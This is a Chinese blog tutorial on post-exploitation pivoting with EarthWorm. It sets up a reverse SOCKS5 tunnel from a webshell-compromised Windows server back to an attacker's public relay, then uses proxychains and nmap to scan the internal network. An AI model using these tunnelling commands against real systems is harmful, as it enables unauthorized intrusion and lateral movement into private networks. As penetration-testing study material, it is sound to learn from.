如何通過EW做Socks5代理進行內網滲透

0x00 前言

最近搞站的時候有內網穿透的需求,大佬向我推薦了EW,本文模擬一個攻擊場景對Earthworm的使用方法做一個簡單的介紹。其實相應的內容EW的官網已經說得很詳細了,我這裡純粹是作為個人筆記從如下幾個方面做一個簡單的記錄:

1、如何使用EW做反向Socks5代理

2、瀏覽器如何設置Socks5代理訪問目標內網Web服務

3、利用proxychains給終端設置Socks5代理(方便將本地命令行工具的流量代理進目標內網)

本圖片來自EW官網,鏈接在文末

0x01 基礎環境及網路拓撲

Kali Linux(Attacker 內網 192.168.40.135)

Ubuntu 16.04.3(Attacker 公網 120.xxxx.xxx.xxx

Windows Server 2008(Victim 目標內網 10.xxxx.xxx.xxx

網路拓撲:Kali Linux是我本地的一台虛擬機,Ubuntu是公網上的一台ECS,Windows Server 2008是目標機器,內網IP,部分埠映射到外網。

此處應該有一個拓撲圖,等我之後學習下Visio,在把圖補充上來23333

0x02 場景模擬

我們現在已拿到目標內網一台機器的許可權(該機器將80埠映射至外網,Web服務存在漏洞,已拿到webshell)。需要對內網做進一步的滲透,目前我有一台公網的Ubuntu,一台內網的Kali,如何反向Socks5將Kali的流量代理進目標內網?

0x03 使用EW做反向Socks5代理

這裡我僅演示通過EW做反向Socks5代理,正向、多級級聯的的代理方式可以參考官方文檔。

第1步:在公網的Ubuntu上執行如下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

該命令的意思是說公網機器監聽1080和1024埠。等待攻擊者機器訪問1080埠,目標機器訪問1024埠。

第2步:目標機器執行如下命令:

ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024

其中-d參數的值為剛剛的公網IP

第3步:攻擊者機器通過proxychains或瀏覽器設置Socks5代理訪問目標內網服務

0x04 瀏覽器設置Socks5代理

設置完畢後點擊確定即可。此時已可以通過瀏覽器訪問目標內網的Web服務。

0x05 使用proxychains給終端設置Socks5代理

第1步:下載及安裝proxychains

cd /usr/local/srcgit clone https://github.com/rofl0r/proxychains-ng.gitcd proxychains-ng ./configure --prefix=/usr --sysconfdir=/etcmake && make installmake install-configcd .. && rm -rf proxychains-ng

第2步:編輯proxychains配置文件設置代理

vi /etc/proxychains.confsocks5 120.xx.xx.xx 1080

第3步:舉個栗子:使用proxychains nmap對目標內網掃描

設置完成後即可使用類似proxychains nmap 192.168.40.133這種方式將nmap的流量代理至目標內網進行掃描,其他命令行工具同理。

0x06 後記

在使用的過程中也出現了一些問題,有的工具流量不走sock5代理,就很尷尬,具體原因不詳。有點困了,回家睡覺,剩下的問題明天再解決。身體是革命的本錢。

希望對這方面內容感興趣的同學偶然看到了這篇文章能有所收穫吧,當然,如有謬誤還請不吝賜教。

0x07 參考鏈接

針對國內一大廠的後滲透 - 持續

利用proxychains在終端使用socks5代理 - CSDN博客

jingyan.baidu.com/album

EarthWorm


推薦閱讀:

TAG:滲透測試 | 網路安全 | 內網安全 |